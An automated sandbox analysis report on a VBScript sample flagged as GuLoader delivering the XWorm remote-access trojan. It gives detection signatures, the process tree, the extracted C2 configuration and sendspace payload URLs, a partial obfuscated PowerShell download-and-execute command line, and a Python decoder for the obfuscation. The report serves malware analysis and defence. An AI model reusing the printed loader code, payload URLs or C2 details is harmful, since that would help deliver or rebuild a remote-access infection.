Windows Analysis Report
windows.vbs

Overview

General Information

Sample name:windows.vbs
Analysis ID:1446635
MD5:828b53e8f1faed52722f7b7dd53c8c92
SHA1:f80c8f0bcb94ea38d10e239b203e4e990b649540
SHA256:d0f73c23361be86872a1a87ef43e998a0e1e4fabbd40f5cd86ae333e1a09bdb7
Tags:vbs

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script argument omitted>" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7432 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7588 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script argument omitted>" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7744 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8060 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
{"C2 url": ["rachesxwdavid.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source | Rule | Description | Author | Strings
0000000D.00000002.1850007327.0000000008450000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000D.00000002.1843333872.0000000005723000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0000000D.00000002.1850717650.0000000008D34000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Source | Rule | Description | Author | Strings
amsi64_7308.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_7308.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x1007b:$b2: ::FromBase64String(
  • 0xd427:$s1: -join
  • 0x6bd3:$s4: +=
  • 0x6c95:$s4: +=
  • 0xaebc:$s4: +=
  • 0xcfd9:$s4: +=
  • 0xd2c3:$s4: +=
  • 0xd409:$s4: +=
  • 0xf657:$s4: +=
  • 0xf6d7:$s4: +=
  • 0xf79d:$s4: +=
  • 0xf81d:$s4: +=
  • 0xf9f3:$s4: +=
  • 0xfa77:$s4: +=
  • 0xdb40:$e4: Get-WmiObject
  • 0xdd2f:$e4: Get-Process
  • 0xdd87:$e4: Start-Process
amsi32_7588.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xffe8:$b2: ::FromBase64String(
  • 0xd427:$s1: -join
  • 0x6bd3:$s4: +=
  • 0x6c95:$s4: +=
  • 0xaebc:$s4: +=
  • 0xcfd9:$s4: +=
  • 0xd2c3:$s4: +=
  • 0xd409:$s4: +=
  • 0xf657:$s4: +=
  • 0xf6d7:$s4: +=
  • 0xf79d:$s4: +=
  • 0xf81d:$s4: +=
  • 0xf9f3:$s4: +=
  • 0xfa77:$s4: +=
  • 0xdb40:$e4: Get-WmiObject
  • 0xdd2f:$e4: Get-Process
  • 0xdd87:$e4: Start-Process
  • 0x17a3b:$e4: Get-Process

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", ProcessId: 1364, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", ProcessId: 1364, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script argument omitted>"
Timestamp:05/23/24-18:27:12.688536
SID:2852870
Source Port:8895
Destination Port:49713
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:05/23/24-18:27:12.688536
SID:2852874
Source Port:8895
Destination Port:49713
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:05/23/24-18:26:11.361514
SID:2855924
Source Port:49713
Destination Port:8895
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: rachesxwdavid.duckdns.org | Avira URL Cloud: Label: malware
Source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["rachesxwdavid.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: qm.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbS source: powershell.exe, 0000000D.00000002.1849045722.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Traffic | Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.9:49713 -> 57.128.155.22:8895
Source: Traffic | Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 57.128.155.22:8895 -> 192.168.2.9:49713
Source: Traffic | Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 57.128.155.22:8895 -> 192.168.2.9:49713
Source: Malware configuration extractor | URLs: rachesxwdavid.duckdns.org
Source: unknown | DNS query: name: rachesxwdavid.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.9:49713 -> 57.128.155.22:8895
Source: Joe Sandbox View | IP Address: 57.128.155.22
Source: Joe Sandbox View | IP Address: 69.31.136.17
Source: Joe Sandbox View | IP Address: 69.31.136.57
Source: Joe Sandbox View | ASN Name: ATGS-MMD-ASUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /pro/dl/tbfvpd HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: fs03n1.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /pro/dl/dy1f16 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: fs13n5.sendspace.com | Connection: Keep-Alive | Cookie: SID=asnkose8meuts76a32vtsvb0k7
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
              Source: global traffic | DNS traffic detected: DNS query: fs03n1.sendspace.com
              Source: global traffic | DNS traffic detected: DNS query: fs13n5.sendspace.com
              Source: global traffic | DNS traffic detected: DNS query: rachesxwdavid.duckdns.org
              Source: powershell.exe, 0000000D.00000002.1845952673.000000000706B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C82226000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs03n1.sendspace.com
              Source: powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n1.sendspaX
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n1.sendspace.com
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C8220F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n1.sendspace.comx
              Source: wab.exe, 00000011.00000003.1839864776.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs13n5.sendspace.com/
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs13n5.sendspace.com/Ezo8
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs13n5.sendspace.com/om:443t
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs13n5.sendspace.com/yz
              Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C8154F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C8203C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 00000011.00000002.2582688527.000000000629C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 00000011.00000002.2594401027.0000000021320000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2582688527.00000000062B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/pro/dl/dy1f16
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/pro/dl/dy1f16/u28
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/pro/dl/tbfvpdP
              Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/pro/dl/tbfvpdXR
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49710 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.9:49711 version: TLS 1.2

              System Summary

              Source: amsi64_7308.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: amsi32_7588.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7308, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7588, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 7125
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 7125
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
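The PowerShell command line above hides every real string behind one decoder, Tilsynsraads: for a literal of length L it keeps the characters at offsets 5, 11, 17, ... for as long as the offset is below L-1, so each real character is preceded by five junk characters and the last six-character chunk (every literal visible here ends in one whose final character is a space) is dropped. Handelsmssiges then feeds the decoded text to $Nondiligently106, which decodes to iex. The Python below is an added example and is not part of the report or of the sample: it reimplements that loop and runs it over literals copied from the command line above. Only literals without runs of consecutive spaces are used, because the report's rendering appears to have collapsed repeated spaces in the longer ones (the full User-Agent literal, for instance, decodes correctly only as far as "Mozilla/5.0 (Windows NT " when taken from this page), so the script excerpt embedded in the code is a constructed fragment in the shape of the original, not the whole command line.

```python
import re


def tilsynsraads(literal: str, start: int = 5, step: int = 6) -> str:
    """Reimplementation of the sample's string decoder.

    PowerShell original (variable names shortened):
      $Afprver = $Paradoxer.Length - 1
      For ($i = 5; $i -lt $Afprver; $i += 6) { $out += $Paradoxer.Substring($i, 1) }
    The comparison is against Length-1, so the real character of the last
    chunk is never copied; that is why every literal carries a throw-away tail.
    """
    out = []
    i = start
    while i < len(literal) - 1:
        out.append(literal[i])
        i += step
    return "".join(out)


# Literals copied from the command line in this report. UA_PREFIX is only the
# first 72 characters of the User-Agent literal (see the lead-in for why).
UA_PREFIX = "Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde "
MELLITE = " CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice "
OVERMUCH = ("CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E faw"
            "Damno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda."
            "Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/"
            "Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ")
OSCHEOLITH = "Sutte> Fluo "
NONDILIGENT = "SkabeiDetrae.ligtxrub i "

# Constructed excerpt in the shape of the report's command line: only the
# assignments, without the Set-Content/Test-Path check and the truncated tail.
SAMPLE_SCRIPT = ";".join([
    "$Toniskes=Tilsynsraads '" + UA_PREFIX + "'",
    "$Mellite=Tilsynsraads '" + MELLITE + "'",
    "$Overmuch=Tilsynsraads '" + OVERMUCH + "'",
    "$Oscheolith=Tilsynsraads '" + OSCHEOLITH + "'",
    "$Nondiligently106=Tilsynsraads '" + NONDILIGENT + "'",
])

# One decoder call with its single-quoted argument; the literals contain no quote.
CALL = re.compile(r"Tilsynsraads\s+'([^']*)'")


def decode_literals(script: str) -> list[str]:
    """Every Tilsynsraads '...' literal in the script, decoded, in order."""
    return [tilsynsraads(m.group(1)) for m in CALL.finditer(script)]


def rewrite_script(script: str) -> str:
    """Replace each decoder call with the plain single-quoted string it yields."""
    def plain(m: re.Match) -> str:
        return "'" + tilsynsraads(m.group(1)).replace("'", "''") + "'"
    return CALL.sub(plain, script)


if __name__ == "__main__":
    names = ["Toniskes", "Mellite", "Overmuch", "Oscheolith", "Nondiligently106"]
    for name, value in zip(names, decode_literals(SAMPLE_SCRIPT)):
        print(f"${name} = {value!r}")
    print(rewrite_script(SAMPLE_SCRIPT))
```

rewrite_script is the step worth keeping in a toolbox: applied to the full command line (taken from the process tree or a Sysmon event rather than from a rendered report), it turns the script into readable PowerShell in which the download URL, the User-Agent, the %appdata% drop path and the iex invocation are visible without executing anything.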
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF886ECC856
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF886ECC359
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF886ECD602
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_02A7DD80
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_02A7F2A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_2401B2B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_24017A30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_2401BB80
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_24010F48
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_2401AF68
              Source: windows.vbs | Initial sample: Strings found which are bigger than 50
